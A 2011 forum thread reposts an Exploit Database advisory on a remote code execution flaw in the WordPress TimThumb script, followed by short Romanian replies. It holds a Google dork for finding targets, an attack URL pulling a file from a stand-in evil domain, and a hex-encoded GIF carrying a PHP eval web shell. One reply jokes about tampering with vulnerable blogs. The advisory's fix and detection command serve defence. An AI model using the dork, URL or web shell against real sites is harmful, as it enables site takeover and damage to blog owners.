Gabriel87 Posted August 11, 2011 Report Share Posted August 11, 2011 # Exploit Title: WordPress TimThumb Plugin - Remote Code Execution# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com# Date: 3rd August 2011# Author: MaXe# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php# Version: 1.32# Screenshot: See attachment# Tested on: Windows XP + Apache + PHP (XAMPP)WordPress TimThumb (Theme) Plugin - Remote Code ExecutionVersions Affected:1.* - 1.32 (Only version 1.19 and 1.32 were tested.)(Version 1.33 did not save the cache file as .php)Info: (See references for original advisory)TimThumb is an image resizing utility, widely used in many WordPress themes.External Links:http://www.binarymoon.co.uk/projects/timthumb/http://code.google.com/p/timthumb/Credits:- Mark Maunder (Original Researcher)- MaXe (Indepedendent Proof of Concept Writer)-:: The Advisory ::-TimThumb is prone to a Remote Code Execution vulnerability, due to thescript does not check remotely cached files properly. By crafting aspecial image file with a valid MIME-type, and appending a PHP file atthe end of this, it is possible to fool TimThumb into believing that itis a legitimate image, thus caching it locally in the cache directory.Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.)http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.phpStored file on the Target: (This can change from host to host.)1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.Proof of Concept File:\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00(Transparent GIF + <?php @eval($_GET['cmd']) ?>-:: Solution ::-Update to the latest version 1.34 or delete the timthumb file.NOTE: This file is often renamed and you should therefore issuea command like this in a terminal: (Thanks to rAWjAW for this info.)find . | grep php | xargs grep -s timthumbDisclosure Information:- Vulnerability Disclosed (Mark Maunder): 1st August 2011- Vulnerability Researched (MaXe): 2nd August 2011- Disclosed at The Exploit Database: 3rd August 2011References:http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/http://code.google.com/p/timthumb/issues/detail?id=212http://programming.arantius.com/the+smallest+possible+gifSursa : Exploits Database by Offensive Security Quote Link to comment Share on other sites More sharing options...
lns Posted August 12, 2011 Report Share Posted August 12, 2011 am luat si eu un hack sanatos cu pluginul asta sapt trecuta... mi-a sters tot de pe ftp si nu aveam nici backup Quote Link to comment Share on other sites More sharing options...
gogusan Posted August 12, 2011 Report Share Posted August 12, 2011 bun tare!eu nu ti-as fi sters nimic, doar mai adaugam niste "chestii trestii" sunt o gramada de bloguri vulnerabile Quote Link to comment Share on other sites More sharing options...
lns Posted August 12, 2011 Report Share Posted August 12, 2011 da, majoritatea folosesc timthumb Quote Link to comment Share on other sites More sharing options...
michee Posted August 13, 2011 Report Share Posted August 13, 2011 am dat si eu peste un blog spart cu asta. faza e ca timthumb asta nu aparea la pluginurile instalate in admin-ul blogului....... Quote Link to comment Share on other sites More sharing options...